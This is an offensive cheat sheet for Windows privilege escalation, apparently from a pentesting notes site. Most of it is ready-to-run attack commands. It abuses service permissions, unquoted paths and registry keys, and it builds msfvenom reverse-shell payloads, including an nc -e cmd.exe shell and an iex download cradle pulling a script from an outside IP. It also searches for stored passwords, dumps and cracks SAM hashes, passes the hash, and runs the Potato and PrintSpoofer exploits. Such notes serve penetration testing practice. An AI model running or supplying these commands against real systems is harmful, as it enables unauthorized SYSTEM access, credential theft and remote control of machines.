Windows PrivEsc

METHODOLOGY:

https://lolbas-project.github.io/#

POWERSHELL:

#Check execution policy
Get-ExecutionPolicy -List
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope CurrentUser

#Set execution policy
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope CurrentUser
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

#Execution policy bypass
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope CurrentUser

PERMISSIONS:

.\accesschk.exe /accepteula Seatbelt.exe
icacls Seatbelt.exe

SERVICE EXPLOITS

INSECURE SERVICE PERMISSIONS
#Useful Permissions (SERVICE STOP, SERVICE START)
#Dangerous Permissions (SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS)
#Run winPEAS and check under "Service Information"
#Run PowerUp and check "Checking service permissions"
#Check if you can "MODIFY" any service. Confirm it from the "Modifiable Services" section below it.
#Verify the permissions using "accesschk". We need to have START, STOP, SERVICE_CHANGE_CONFIG
accesschk.exe /accepteula -uwcqv <user> <service>
accesschk.exe -ucqv <service>
#Query the service configuration. Check START_TYPE(DEMAND), BINARY_PATH_NAME, DEPENDENCIES, SERVICE_START_NAME
sc qc <service>
#Check current state of the service
sc query <service>
#Set binary path to reverse shell payload
sc config <service> binpath= "\"C:\PrivEsc\reverse.exe\""
#OR
sc config <service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
#If SERVICE_START_NAME isn't LocalSystem then run the following:
sc config upnphost obj= ".\LocalSystem" password= ""
#Start a listener in Kali and then start the service to get SYSTEM shell
net start <service>

--------------------------------------------------------------------------------------

UNQUOTED SERVICE PATHS
#Run winPEAS and check "Service Information"
#Run PowerUp and check "Checking for unquoted service paths"
#Check if there is a service with unquoted service path.
#EXAMPLE: C:\Program Files\Unquoted Path Service\Common Files\unquoted.exe
#Verify the permissions using "accesschk". We need to have START, STOP permissions
accesschk.exe /accepteula -uwcqv <user> <service>
accesschk.exe -ucqv <service>
#Check WRITE permissions on each directory in existing binary path (commands commented)
accesschk.exe /accepteula -uwdq C:\
#accesschk.exe /accepteula -uwdq "C:\Program Files\"
#accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
#The current user group (mostly BUILTIN\Users) should have WRITE permissions
#This means if we create a file called Common.exe, it will get executed when the service starts
#Create a msfvenom reverse shell with name Common.exe and copy it to the path we have WRITE permissions to.
#Start a listener and start the service to get reverse shell
net start <service>

--------------------------------------------------------------------------------------

WEAK REGISTRY PERMISSIONS
#Run winPEAS and check "Check if you can modify the registry of the service"
#EXAMPLE: HKLM\SYSTEM\CurrentControlSet\services\regsvc ... Here regsvc = <service>
#Verify the permissions using Powershell or accesschk.exe
Get-Acl HKLM\SYSTEM\CurrentControlSet\services\regsvc | Format-List
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
#If NT AUTHORITY/INTERACTIVE has ALL_ACCESS, do the next step
#Check if we can START and STOP the service
accesschk.exe -ucqv <user> <service>
#View the current value in the registry entry. (ObjectName should be LocalSystem)
reg query HKLM\System\CurrentControlSet\Services\regsvc
#Overwrite the Image_Path with reverse shell executable. (This is similar to service bin_path)
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
#Start a listener on Kali ad then start the service
net start <service>

--------------------------------------------------------------------------------------

INSECURE SERVICE EXECUTABLE
#If the original service executable is modifiable by the current user then we can replace it with reverse shell
#Run winPEAS and check "Service Information"
#Run PowerUp and check "Checking service executable and argument permissions"
#Check for "File Permissions: Everyone [AllAccess]
#EXAMPLE C:\Program Files\File Permissions Service\fileperm.exe
#Verify the permissions with accesschk. We need Everyone: File All Access
accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\fileperm.exe"
#Check if we can START and STOP the service
accesschk.exe /accepteula -uvqc <service>
#Backup the original service executable
copy "C:\Program Files\File Permissions Service\fileperm.exe" C:\temp\
#Overwrite the original service executable with reverse shell
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
#Start a listener on Kali and start the service
net start <service>

--------------------------------------------------------------------------------------

DLL HIJACKING
#Needs admin access

REGISTRY EXPLOITS

AUTORUNS
#Needs system restart by admin

--------------------------------------------------------------------------------------

ALWAYS INSTALL ELEVATED
#The exploit will only work if AlwaysInstallElevated is set to 1 for both (0x1)
#Run PowerUp and check "Checking for AlwaysInstallElevated registry key"
#HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
#HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#Create a reverse shell with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi
#Start a listener and run the .msi file to get SYSTEM shell
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

PASSWORDS

STORED PASSWORDS IN REGISTRY
#You can even query the whole registry manually:
reg query HKLM /f password /t REG_SZ /s (Search Local Machine registry)
reg query HKCU /f password /t REG_SZ /s (Search Current User registry)

#If the user is admin then u will get a admin shell using this:
winexe -U 'admin%pass' //10.10.10.10 cmd.exe

#If the user is admin then u will get a system shell using this:
winexe -U 'admin%pass' --system //10.10.10.10 cmd.exe

--------------------------------------------------------------------------------------

SAVED CREDS
#Run winpeas and check under "Windows Credentials"
#Verify this manually
cmdkey /list
#Use runas command to run a program in the context of the admin user
runas /savecred /user:admin C:\PrivEsc\reverse.exe

--------------------------------------------------------------------------------------

CONFIGURATION FILES
#You can try manually querying the output: (Queries output in current directory)
dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt
#You can check winpeas under "Looking for possible known files that contain creds.
#Check if you find Unattend.xml. If found, view the contents of it to find creds.
#Use winexe to login as admin user using the password found.

--------------------------------------------------------------------------------------

SAM
#Check if you have READ access to SAM and SYSTEM files
#These files are present at C:\Windows\System32\config
#Backups of these files can be found at C:\Windows\Repair or C:\Windows\System32\RegBack directory
#You can check winpeas under "Looking for possible known files that contain creds.
#Copy the files to Kali machine and extract the hashes (31d6 is empty hash)
python pwdump.py SYSTEM SAM
#Crack the password using JTR or Hashcat
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt
#Use winexe to login as admin user using the password cracked

--------------------------------------------------------------------------------------

PASS THE HASH
#Use the hash found to get an ADMIN/SYSTEM shell without the need to crack the hash
pth-winexe -U 'admin%fullHash' //10.10.10.10 cmd.exe
pth-winexe -U 'admin%fullHash' --system //10.10.10.10 cmd.exe

SCHEDULED TASKS

#You cannot query tasks of a particular user. You need to query all the tasks
#CMD
schtasks /query /fo LIST /v
#POWERSHELL
Get-ScheduledTask | where {$_.TaskPath -notlike  "\Microsoft*"} | ft TaskName,TaskPath,State
#Also check various directories if you can find a script that is running as a scheduled task
#Check the permissions of the script/task using accesschk
accesschk.exe /accepteula -quvw <user> <task/script>
#Check the contents of the file
type <task/script>
#Create a backup of the original file and then append the following to get reverse shell
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
#Start a netcat listener. You will get a shell when the task is run

INSECURE GUI APPS

#You need RDP access and an application which is running with admin rights

STARTUP APPS

#You need to simulate ADMIN LOGIN
#Similar to AutoRun. Windows stores Startup applications in: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
#The files in this directory are shortcuts (lnk files).
#Check the permissions of that directory with icacls
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#Check if BUILTIN\Users group has full access (F)

#You can also run accesschk.exe to check for (F)
accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

#Generate payloaad:
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=port -f exe -o x.exe

#METHOD 1
#Transfer it to 
C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup
#Start a netcat listener and simulate a login from admin to get a shell

#METHOD 2
#Transfer the reverse shell exe to C:\Temp\reverse.exe
#Create a VBScript to create a shortcut of that exe to the StartUp directory:
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\Temp\reverse.exe"
oLink.Save
#Transfer the VBScript to target machine
#Run the script to create a shortcut:
cscript CreateShortcut.vbs
#Simulate an admin login to get a shell

INSTALLED APPS

#If you find any 3rd party installed apps then you can use exploitBD.
#For this, go to exploitDB. Then use the filter to curate the results. 
#Can be used to find for Linux as well
#Manually enumerate the programs installed:
tasklist /V
#You can use Seatbelt to check for non-standard processes
#You can use Winpeas and check the same under "Processes Information"

HOT POTATO

#Unpatched versions on Windows 7,8 and earlier versions of Windows 10 are vulnerable to this. (Patched in 2016)
#Start netcat listener and then run the following command to get a shell.
.\potato.exe -ip <victimIP> -cmd "C:\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true

TOKEN IMPERSONATION

JUICY POTATO
#Check if SeImpersonatePrivilege is enabled
whoami /priv
#Create a bat file with following content (You can replace this with msfvenom)
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell-2.ps1')
#Transfer the bat file, jp.exe to target machine
#Host a Nishang shell and start a netcat listener
#Run the exploit
./jp.exe -t * -p shell.bat -l 4444
#If the exploit doesn't give a shell then check the CLID in output. You can even check it on http://ohpe.it/juicy-potato/CLSID/
#Then run the following
j.exe -l 4444 -p shell.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}

--------------------------------------------------------------------------------------

ROGUE POTATO
#Successor of JP as JP was patched in the later versions of Windows10
#You need to have a shell as a service account (LocalService)
#Check if SeAssignPrimaryTokenPriviliege or SeImpersonatePrivilege is enabled
#Run a socat redirector to redirect traffic to port 135 over to port 9999 on Victim machine
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.234.60:9999
#Start a netcat listener and run the RoguePotato exploit. (9999 bc we used in socat)
RoguePotato.exe -r <kaliIP> -e "C:\PrivEsc\reverse.exe" -l 9999
#You will get system shell

--------------------------------------------------------------------------------------

PRINTSPOOFER
#You need to have a shell as a service account (LocalService)
#Check if SeAssignPrimaryTokenPriviliege or SeImpersonatePrivilege is enabled
#Start a netcat listener and run the PrintSpoofer exploit
PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
#You will get system shell

PORT FORWARDING

#Used when we need to run an exploit on Kali but vulnerable program is listening on an internal port
#We need to forward Kali Port to internal port on Windows
#Can be used with winexe when 445 is listening internally

PLINK
#Run the following command
.\plink.exe root@10.11.15.38 -R <kaliPORT>:127.0.0.1:<victimPORT>
.\plink.exe root@10.11.15.38 -R 445:127.0.0.1:445

CHISEL
#Run this on Kali machine
./chisel_1.5.2_linux_amd64 server -p 444 --reverse
#Run this on victim machine
chisel.exe client <kaliIP>:444 R:445:127.0.0.1:445

PreviousTomcat NextScheduled Tasks

Last updated 3 years ago

Was this helpful?